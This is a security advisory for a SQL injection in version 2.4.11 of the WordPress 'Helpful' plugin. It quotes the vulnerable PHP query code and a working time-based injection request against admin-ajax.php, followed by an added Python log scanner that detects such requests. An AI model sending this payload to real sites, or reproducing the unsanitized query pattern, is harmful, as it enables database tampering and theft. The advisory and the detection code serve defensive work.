Vendor: Helpful Plugin
By: Numan Türle
CVSS: 8.8 (HIGH)
SQL Injection
CWE: 89
Product Name: Helpful Plugin
Affected Version From: 2.4.11
Affected Version To: 2.4.11
Patch Exists: YES
Related CWE: N/A
CPE: 2.4.11
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2019

Helpful 2.4.11 SQL Injection – WordPress Plugin

The vulnerability exists because the 'helpful' plugin does not sufficiently sanitize user-supplied input in the 'post_id' parameter of the 'helpful_ajax_pro' AJAX action before using it in a SQL query. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in the application's database, which allows the attacker to read, modify or delete data, compromise the vulnerable system and potentially compromise other systems. The vulnerability is confirmed in version 2.4.11. Other versions may also be affected.

Mitigation:

Update to version 2.4.12 or later.

Exploit-DB raw data:

Title: Helpful 2.4.11 Sql Injection  - Wordpress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle


core/Core.class.php
// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );

// set args for insert command
$args = array(
    'post_id' => $_REQUEST['post_id'],
    'user' => $_REQUEST['user'],
    'pro' => $_REQUEST['pro'],
    'contra' => $_REQUEST['contra']
);
$result = $this->insert( $args );

@params = 'post_id' => $_REQUEST['post_id'],
call function insert -->

if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");



Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1
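
Detection example (added here, not part of the original advisory or the plugin's code): a Python check that scans web access logs for 'helpful_ajax_pro' requests whose 'post_id' is not a plain integer, which is the shape the query above expects. The log format (combined log format), the function names and the sample lines are assumptions constructed for illustration; because the handler reads $_REQUEST, values sent in a POST body do not appear in access logs and are not covered by this check.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d+")      # shape a legitimate post_id should have
ACTION = "helpful_ajax_pro"      # AJAX action named in the advisory


def suspicious_post_id(line):
    """Return the decoded post_id if the line is a helpful_ajax_pro request
    whose post_id is not a plain integer; otherwise return None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs percent-decodes values, so encoded payloads are checked too
    params = parse_qs(url.query, keep_blank_values=True)
    if ACTION not in params.get("action", []):
        return None
    for value in params.get("post_id", []):
        # an empty post_id never reaches the query (the plugin returns early)
        if value and not INT_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Yield (line_number, client_ip, post_id) for every flagged line."""
    for number, line in enumerate(lines, start=1):
        value = suspicious_post_id(line)
        if value is not None:
            yield number, line.split(" ", 1)[0], value


# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2019:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=42&pro=1&user=1 HTTP/1.1" 200 2',
    '192.0.2.77 - - [10/Apr/2019:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1 HTTP/1.1" 200 2',
    '192.0.2.10 - - [10/Apr/2019:10:00:12 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat&post_id=abc HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits on a site still running 2.4.11 are worth correlating with response times and database logs for the same timestamps.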